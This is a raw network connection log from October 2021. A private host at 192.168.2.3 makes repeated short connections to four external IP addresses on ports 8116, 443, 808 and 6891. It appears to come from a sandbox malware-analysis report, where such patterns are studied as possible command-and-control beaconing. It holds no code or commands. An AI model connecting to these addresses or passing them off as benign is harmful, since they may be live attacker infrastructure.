Oct 28, 2021 05:27:07.881351948 CEST	49858	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.888252020 CEST	49858	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.941291094 CEST	8116	49858	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:08.021619081 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.021660089 CEST	443	49860	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.021761894 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.022496939 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.022515059 CEST	443	49860	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.251441002 CEST	443	49859	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.255305052 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.255899906 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.255918026 CEST	443	49859	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.263079882 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.263111115 CEST	443	49859	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.263338089 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.263356924 CEST	443	49859	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.515233040 CEST	443	49860	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.515502930 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.516279936 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.516288042 CEST	443	49860	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.521517038 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.521521091 CEST	443	49860	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.521713972 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.521723986 CEST	443	49860	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.972697020 CEST	443	49859	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.972779989 CEST	443	49859	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:08.972831964 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.973115921 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.976401091 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:08.976452112 CEST	443	49859	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:09.144927025 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.212747097 CEST	443	49860	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:09.212833881 CEST	443	49860	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:09.212918997 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:09.212938070 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:09.220890045 CEST	49860	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:09.220921040 CEST	443	49860	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:09.308048010 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.308167934 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.308844090 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.342777014 CEST	49862	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.471771002 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.471833944 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.471911907 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.472431898 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.477745056 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.477884054 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.510457039 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.510607004 CEST	49862	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.511499882 CEST	49862	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.635363102 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.640697002 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.640714884 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.640727043 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.678086996 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.678210974 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.678283930 CEST	49862	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.678843021 CEST	49862	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.682884932 CEST	49862	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.683160067 CEST	49862	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:09.845335960 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.849320889 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.849524021 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:09.849634886 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:10.021157980 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:10.021173954 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:10.021244049 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:10.021298885 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:10.024055958 CEST	49861	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:10.146240950 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.186947107 CEST	808	49861	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:10.233127117 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:10.233163118 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:10.233285904 CEST	49862	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:10.240408897 CEST	49862	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:10.312561989 CEST	6891	49863	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.312920094 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.313720942 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.359137058 CEST	49864	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.407114983 CEST	808	49862	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:10.479803085 CEST	6891	49863	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.479918957 CEST	6891	49863	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.480067968 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.481096029 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.487879038 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.487982035 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.526086092 CEST	6891	49864	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.526272058 CEST	49864	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.527592897 CEST	49864	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.654058933 CEST	6891	49863	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.654099941 CEST	6891	49863	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.693506002 CEST	6891	49864	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.693548918 CEST	6891	49864	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.693635941 CEST	49864	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.694538116 CEST	49864	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.698227882 CEST	49864	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.698343992 CEST	49864	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:10.864257097 CEST	6891	49864	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.864304066 CEST	6891	49864	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:10.864332914 CEST	6891	49864	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:11.040416956 CEST	6891	49863	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:11.040467978 CEST	6891	49863	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:11.040576935 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:11.040616035 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:11.044668913 CEST	49863	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:11.175015926 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.210769892 CEST	6891	49863	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:11.228024960 CEST	8116	49865	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.228147984 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.229784966 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.259521961 CEST	6891	49864	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:11.259557009 CEST	6891	49864	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:11.259641886 CEST	49864	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:11.265340090 CEST	49864	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:11.283354998 CEST	8116	49865	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.283554077 CEST	8116	49865	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.283654928 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.284187078 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.288147926 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.288269043 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.340871096 CEST	8116	49865	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.341181993 CEST	8116	49865	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.341573000 CEST	8116	49865	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.373291969 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.428793907 CEST	8116	49866	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.429002047 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.429471970 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.431286097 CEST	6891	49864	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:11.484195948 CEST	8116	49866	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.484438896 CEST	8116	49866	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.485225916 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.485752106 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.489507914 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.489660025 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.531491041 CEST	8116	49865	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.531519890 CEST	8116	49865	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.531564951 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.531604052 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.534826040 CEST	49865	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.544430017 CEST	8116	49866	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.587450027 CEST	8116	49865	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.660221100 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:11.660260916 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:11.660608053 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:11.661005974 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:11.661016941 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:11.714809895 CEST	8116	49866	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.714832067 CEST	8116	49866	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.715027094 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.715043068 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.723279953 CEST	49866	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:11.778100967 CEST	8116	49866	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:11.848316908 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:11.848366022 CEST	443	49868	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:11.848531961 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:11.849792957 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:11.849816084 CEST	443	49868	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.182951927 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.185921907 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.186501026 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.186511040 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.191725016 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.191734076 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.191843033 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.191858053 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.372543097 CEST	443	49868	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.372644901 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.373277903 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.373291016 CEST	443	49868	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.378248930 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.378262997 CEST	443	49868	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.378403902 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.378417015 CEST	443	49868	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.904068947 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.904274940 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.904297113 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.904320002 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:12.904427052 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.910482883 CEST	49867	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:12.910532951 CEST	443	49867	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:13.040297985 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.093890905 CEST	443	49868	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:13.093970060 CEST	443	49868	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:13.094099998 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:13.094130993 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:13.106456041 CEST	49868	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:13.106493950 CEST	443	49868	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:13.200954914 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.201149940 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.201785088 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.220359087 CEST	49870	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.362369061 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.362492085 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.362673044 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.363179922 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.367163897 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.367268085 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.383184910 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.383331060 CEST	49870	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.386630058 CEST	49870	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.523638964 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.527761936 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.527785063 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.527796030 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.527806997 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.549499989 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.549664021 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.549731970 CEST	49870	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.550192118 CEST	49870	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.552817106 CEST	49870	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.552920103 CEST	49870	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.712981939 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.715564966 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.715605021 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.715624094 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.911789894 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.911814928 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:13.911874056 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.911909103 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:13.914942026 CEST	49869	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:14.033612967 CEST	49872	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.075634003 CEST	808	49869	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:14.098107100 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:14.098138094 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:14.098267078 CEST	49870	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:14.106209993 CEST	49870	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:14.199685097 CEST	6891	49872	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.199832916 CEST	49872	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.200354099 CEST	49872	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.217127085 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.269745111 CEST	808	49870	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:14.366311073 CEST	6891	49872	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.366338968 CEST	6891	49872	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.366456985 CEST	49872	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.367805004 CEST	49872	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.373183966 CEST	49872	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.373317003 CEST	49872	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.383435965 CEST	6891	49873	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.383567095 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.384422064 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.539309025 CEST	6891	49872	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.539345980 CEST	6891	49872	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.539376974 CEST	6891	49872	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.550517082 CEST	6891	49873	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.550544977 CEST	6891	49873	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.550642967 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.551151991 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.554955006 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.555006981 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.721151114 CEST	6891	49873	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.721173048 CEST	6891	49873	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.922530890 CEST	6891	49872	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.922535896 CEST	6891	49872	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:14.922655106 CEST	49872	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:14.927953959 CEST	49872	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:15.044692039 CEST	49874	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.093044043 CEST	8116	49874	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.093137026 CEST	49874	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.093705893 CEST	49874	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.093851089 CEST	6891	49872	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:15.105241060 CEST	6891	49873	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:15.105257988 CEST	6891	49873	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:15.105353117 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:15.105379105 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:15.112772942 CEST	49873	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:15.141762018 CEST	8116	49874	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.141959906 CEST	8116	49874	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.142087936 CEST	49874	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.142719984 CEST	49874	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.147047043 CEST	49874	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.147166014 CEST	49874	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.195385933 CEST	8116	49874	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.237893105 CEST	49875	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.278927088 CEST	6891	49873	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:15.291887999 CEST	8116	49875	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.291995049 CEST	49875	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.293118954 CEST	49875	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.346800089 CEST	8116	49875	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.346998930 CEST	8116	49875	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.347131968 CEST	49875	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.347660065 CEST	49875	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.351736069 CEST	49875	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.351881981 CEST	49875	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.365262985 CEST	8116	49874	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.365303993 CEST	8116	49874	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.365412951 CEST	49874	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.368526936 CEST	49874	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.405570984 CEST	8116	49875	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.406759024 CEST	8116	49875	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.416702032 CEST	8116	49874	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.487586021 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:15.487647057 CEST	443	49876	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:15.487879992 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:15.488523006 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:15.488543987 CEST	443	49876	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:15.592626095 CEST	8116	49875	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.592726946 CEST	8116	49875	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.592886925 CEST	49875	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.601208925 CEST	49875	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:15.655040026 CEST	8116	49875	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:15.736838102 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:15.736974955 CEST	443	49877	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:15.737128019 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:15.737957954 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:15.737997055 CEST	443	49877	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.005769968 CEST	443	49876	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.005961895 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.006745100 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.006759882 CEST	443	49876	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.010390997 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.010413885 CEST	443	49876	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.010473013 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.010493040 CEST	443	49876	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.231674910 CEST	443	49877	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.231837988 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.232702971 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.232713938 CEST	443	49877	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.237999916 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.238013029 CEST	443	49877	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.238179922 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.238190889 CEST	443	49877	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.718585014 CEST	443	49876	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.718662024 CEST	443	49876	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.718729019 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.718753099 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.721543074 CEST	49876	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.721569061 CEST	443	49876	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.862112999 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:16.926094055 CEST	443	49877	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:16.926158905 CEST	443	49877	192.46.210.220	192.168.2.3
